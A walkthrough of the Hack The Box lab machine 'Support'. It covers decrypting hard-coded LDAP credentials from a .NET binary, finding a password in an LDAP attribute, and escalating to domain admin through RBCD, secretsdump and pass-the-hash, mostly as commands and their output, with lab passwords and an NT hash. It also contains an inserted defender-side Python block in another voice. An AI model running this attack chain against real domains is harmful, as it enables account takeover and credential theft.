Overview

Machine Logo

Support is an easy HTB machine created by 0xdf. It starts with reverse engineering a PE file found in an SMB share to recover encrypted LDAP credentials, followed by some LDAP enumeration to find a user's password in a custom LDAP attribute. For root you exploit RBCD against the DC to impersonate Administrator, then dump all of the NT hashes and WinRM in as Administrator for the root flag.

Nmap Scan

I’ll run nmap on all open TCP ports:

💫 ~/htb/Support/enumeration ➜ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV -vvvv 10.10.11.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 03:41 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:41
Nmap scan report for 10.10.11.174
Host is up, received echo-reply ttl 127 (0.100s latency).
Scanned at 2025-06-13 03:41:34 EDT for 56s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-13 07:41:36Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19493/tcp): CLEAN (Timeout)
| Check 2 (port 32659/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 40490/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-06-13T07:41:45
|_ start_date: N/A
|_clock-skew: -4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

This looks like a domain controller for the domain support.htb. I’ll run nxc to get the FQDN and add it to my /etc/hosts file:

💫 ~/htb/Support/enumeration ➜ nxc smb 10.10.11.174
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
💫 ~/htb/Support/enumeration ➜ echo '10.10.11.174 DC.support.htb support.htb' >> /etc/hosts
💫 ~/htb/Support/enumeration ➜ nxc smb DC.support.htb
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)

Recon

445/tcp - SMB

One thing I always do is check for Guest authentication over SMB. In this case it works, and I use the Guest account to list the SMB shares on the DC:

💫 ~/htb/Support/enumeration ➜ nxc smb DC.support.htb -u Guest -p '' --shares
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\Guest:
SMB 10.10.11.174 445 DC [*] Enumerated shares
SMB 10.10.11.174 445 DC Share Permissions Remark
SMB 10.10.11.174 445 DC ----- ----------- ------
SMB 10.10.11.174 445 DC ADMIN$ Remote Admin
SMB 10.10.11.174 445 DC C$ Default share
SMB 10.10.11.174 445 DC IPC$ READ Remote IPC
SMB 10.10.11.174 445 DC NETLOGON Logon server share
SMB 10.10.11.174 445 DC support-tools READ support staff tools
SMB 10.10.11.174 445 DC SYSVOL Logon server share

Most of these are default shares, apart from support-tools, which I have read access to. I’ll connect using impacket’s smbclient.py and grab whatever is in that share.

💫 ~/htb/Support/enumeration ➜ smbclient.py support.htb/Guest'@'dc.support.htb -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# use support-tools
# ls
drw-rw-rw- 0 Wed Jul 20 13:01:06 2022 .
drw-rw-rw- 0 Sat May 28 07:18:25 2022 ..
-rw-rw-rw- 2880728 Sat May 28 07:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw- 5439245 Sat May 28 07:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw- 1273576 Sat May 28 07:20:06 2022 putty.exe
-rw-rw-rw- 48102161 Sat May 28 07:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw- 277499 Wed Jul 20 13:01:07 2022 UserInfo.exe.zip
-rw-rw-rw- 79171 Sat May 28 07:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw- 44398000 Sat May 28 07:19:43 2022 WiresharkPortable64_3.6.5.paf.exe
# get UserInfo.exe.zip
# exit

A lot of these are stock executables such as Wireshark, 7-Zip, etc. The file UserInfo.exe.zip does not look default.

💫 ~/htb/Support/enumeration ➜ file UserInfo.exe.zip
UserInfo.exe.zip: Zip archive data, made by v2.0 UNIX, extract using at least v2.0, last modified May 27 2022 10:51:04, uncompressed size 12288, method=deflate
💫 ~/htb/Support/enumeration ➜ unzip UserInfo.exe.zip
Archive: UserInfo.exe.zip
inflating: UserInfo.exe
inflating: CommandLineParser.dll
inflating: Microsoft.Bcl.AsyncInterfaces.dll
inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll
inflating: Microsoft.Extensions.DependencyInjection.dll
inflating: Microsoft.Extensions.Logging.Abstractions.dll
inflating: System.Buffers.dll
inflating: System.Memory.dll
inflating: System.Numerics.Vectors.dll
inflating: System.Runtime.CompilerServices.Unsafe.dll
inflating: System.Threading.Tasks.Extensions.dll
inflating: UserInfo.exe.config
💫 ~/htb/Support/enumeration ➜ file UserInfo.exe
UserInfo.exe: PE32 executable for MS Windows 6.00 (console), Intel i386 Mono/.Net assembly, 3 sections

Auth as ldap

This is a .NET PE32 executable for Windows, so I can reverse engineer it using dnSpy.

Reverse Engineering UserInfo.exe

This looks like a tool for querying user information over LDAP, which by default requires credentials. So, as usual when reverse engineering a PE like this, I’m looking for the credentials it uses to authenticate to LDAP.

Protected Function

This function holds the LDAP credentials in encrypted form; the encrypted password is stored as:

0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E

Using this key:

armando

We can use this simple Python 3 script from ChatGPT to decrypt these credentials:

import base64

def decrypt_password():
    # Values recovered from the Protected class in UserInfo.exe
    enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
    key = b"armando"
    xor_pad = 223

    # Step 1: Base64 decode
    encrypted_bytes = base64.b64decode(enc_password)

    # Step 2: XOR decrypt, each byte is XORed with the repeating key and a constant pad
    decrypted_bytes = bytearray()
    for i in range(len(encrypted_bytes)):
        decrypted_byte = encrypted_bytes[i] ^ key[i % len(key)] ^ xor_pad
        decrypted_bytes.append(decrypted_byte)

    # Step 3: Convert to string using latin-1 (or try utf-8 if unsure)
    return decrypted_bytes.decode('latin-1')

# Run it
if __name__ == "__main__":
    password = decrypt_password()
    print("[+] Decrypted password:", password)

This script is able to decrypt the credentials:

💫 ~/htb/Support/enumeration ➜ python3 decrypt.py
[+] Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

We still don’t know which user this password belongs to. Checking the code again, the function LdapQuery leaks the username in the LDAP URL:

Username Found In Code

So that would mean the credentials are:

ldap \ nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

I’ll test these over LDAP via nxc:

💫 ~/htb/Support/enumeration ➜ nxc ldap DC.support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP 10.10.11.174 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP 10.10.11.174 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Auth as support

Using these creds I’ll get a bloodhound dump via bloodhound-python:

💫 ~/htb/Support/enumeration ➜ bloodhound-python -d support.htb -c ObjectProps,Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --zip -dc DC.support.htb -ns 10.10.11.174
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.support.htb
INFO: User with SID S-1-5-21-1677581083-3380853377-188903654-500 is logged in on dc.support.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250613035801_bloodhound.zip

I’ll import this into bloodhound, finding shortest paths to Domain Admins:

PSRemote Found

As you can see, the user support can PSRemote (WinRM) to the DC. Enumerating this user through bloodhound shows nothing else, but we know we have to target this user. One common misconfiguration is putting a user's password in their LDAP description, so I’ll check this via --users in nxc:

LDAP        10.10.11.174    389    DC               support                       2022-05-28 07:12:00 0

No description. Instead I’ll use bloodyAD to retrieve all LDAP attributes for this user:

💫 ~/htb/Support/enumeration ➜ bloodyAD --host DC.support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' get object 'support'

distinguishedName: CN=support,CN=Users,DC=support,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-06-12 12:23:06.370774+00:00
badPwdCount: 0
c: US
cn: support
codePage: 0
company: support
countryCode: 0
dSCorePropagationData: 2022-05-28 11:12:01+00:00
info: Ironside47pleasure40Watchful
instanceType: 4
l: Chapel Hill
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-06-12 12:24:05.964550+00:00
lastLogonTimestamp: 2025-06-12 10:49:33.152026+00:00
logonCount: 0
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb; CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
nTSecurityDescriptor: O:S-1-5-<snip>S-1-5-32-544)
name: support
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: 3139a30a-31fa-4530-9ea4-8053b396a7f1
objectSid: S-1-5-21-1677581083-3380853377-188903654-1105
postalCode: 27514
primaryGroupID: 513
pwdLastSet: 2022-05-28 11:12:00.977708+00:00
sAMAccountName: support
sAMAccountType: 805306368
st: NC
streetAddress: Skipper Bowles Dr
uSNChanged: 86106
uSNCreated: 12617
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
whenChanged: 2025-06-12 10:49:33+00:00
whenCreated: 2022-05-28 11:12:00+00:00

Ah there it is:

info: Ironside47pleasure40Watchful

A custom attribute that bloodhound wouldn’t render in the GUI. I’ll now try to WinRM to the DC using the newfound creds:

💫 ~/htb/Support/enumeration ➜ evil-winrm -i DC.support.htb -u support -p 'Ironside47pleasure40Watchful'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

And with that, I can grab user.txt:

*Evil-WinRM* PS C:\Users\support\Desktop> ls


Directory: C:\Users\support\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/12/2025 3:02 AM 34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
a5ba0d8<snip>

Auth as Administrator

This user has no interesting privileges when running whoami /priv:

*Evil-WinRM* PS C:\Users\support\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

So instead I’ll look at what they have in bloodhound:

RBCD

Support has GenericAll over the DC computer object. The most common way to exploit this is RBCD (Resource Based Constrained Delegation), which has one prerequisite:

  • Attacker must have control over an account that has a samAccountName that ends in $ (like a computer account)

So we need to add a new computer account. By default Domain Users can add up to 10 before their Machine Account Quota (MAQ) is exhausted; I can check this via -M maq in nxc:

💫 ~/htb/Support/enumeration ➜ nxc ldap DC.support.htb -u support -p 'Ironside47pleasure40Watchful' -M maq
LDAP 10.10.11.174 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP 10.10.11.174 389 DC [+] support.htb\support:Ironside47pleasure40Watchful
MAQ 10.10.11.174 389 DC [*] Getting the MachineAccountQuota
MAQ 10.10.11.174 389 DC MachineAccountQuota: 10

The MAQ is 10, so we can perform the RBCD attack without any trouble. First I’ll add a new computer account named xjr$:

💫 ~/htb/Support/enumeration ➜ addcomputer.py support.htb/support -computer-name 'xjr$' -dc-host DC.support.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Successfully added machine account xjr$ with password VBSYRxfuX0ZxwM6jbXMZsXb1J2YyqL1f

Now I own this computer account:

xjr$ \ VBSYRxfuX0ZxwM6jbXMZsXb1J2YyqL1f

Computer accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is why we don’t need GenericWrite over the computer account we just created; the write to DC$'s attribute is covered by support's GenericAll. To abuse the RBCD, I’ll use impacket’s rbcd.py:

💫 ~/htb/Support/enumeration ➜ rbcd.py -delegate-from 'xjr$' -delegate-to 'DC$' -dc-ip '10.10.11.174' -action 'write' 'support.htb'/'support'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] No credentials supplied, supply password
Password:
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] xjr$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] xjr$ (S-1-5-21-1677581083-3380853377-188903654-5601)
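As a defender-side check of what rbcd.py just wrote, here is an added Python example (not from this writeup or from impacket) that parses the msDS-AllowedToActOnBehalfOfOtherIdentity value, a self-relative security descriptor as laid out in MS-DTYP, and lists the SIDs allowed to act on behalf of other identities on DC$. The sample descriptor is constructed in the block with the xjr$ SID from the output above; the access mask used in the constructed ACE is an assumption, not the value impacket writes.

```python
import struct

# SID of the delegate account from the rbcd.py output above (xjr$)
XJR_SID = "S-1-5-21-1677581083-3380853377-188903654-5601"
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004

def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-R-I-S... string as a binary SID (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")            # identifier authority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(buf: bytes, off: int) -> str:
    """Decode the binary SID found at offset off in buf."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def build_rbcd_descriptor(delegate_sids) -> bytes:
    """Constructed sample: self-relative descriptor with one ACCESS_ALLOWED ACE per SID."""
    aces = b""
    for sid in delegate_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE header (type, flags, size), then the access mask (assumed value) and the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), 0x000F01FF) + sid_bytes
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(delegate_sids), 0) + aces
    owner = sid_to_bytes("S-1-5-32-544")  # BUILTIN\Administrators as owner
    # 20-byte header: revision, sbz, control (SE_SELF_RELATIVE | SE_DACL_PRESENT),
    # then offsets of owner, group, SACL and DACL relative to the start of the blob
    header = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))
    return header + owner + dacl

def allowed_to_act(sd: bytes) -> list:
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the DACL: the accounts
    allowed to act on behalf of other identities on this object."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []  # no DACL means nobody is allowed to delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, off + 8))  # SID follows the 4-byte mask
        off += ace_size
    return sids
```

Feeding the raw attribute bytes read from DC$ over LDAP into allowed_to_act() gives the same list rbcd.py prints, which is what to audit for unexpected computer accounts.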

Cool, now we can get a service ticket for cifs/DC.support.htb impersonating Administrator:

💫 ~/htb/Support/enumeration ➜ getST.py -spn "cifs/DC.support.htb" -impersonate 'Administrator' "support.htb/xjr$"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Awesome, using that ticket I can run secretsdump.py to dump all of the NTLM hashes from the DC:

💫 ~/htb/Support/enumeration ➜ secretsdump.py support.htb/Administrator'@'dc.support.htb -k -no-pass -dc-ip 10.10.11.174
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
<snip>

Now I can use that NT hash to WinRM to the DC:

💫 ~/htb/Support/enumeration ➜ evil-winrm -i DC.support.htb -u Administrator -H 'bb06cbc02b39abeddd1335bc30b19e26'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
support\administrator

And I can use that to read root.txt:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/12/2025 3:02 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
c75dfc7729dbf<snip>

Thoughts

Support was a great machine to show beginners how to RE an executable to crack encrypted credentials. I also liked that the user's password was in a custom LDAP attribute, which makes people dig further to get the creds. Root was cool; I like how 0xdf made the root path RBCD instead of something easy. Overall I’d give this box a solid 8/10.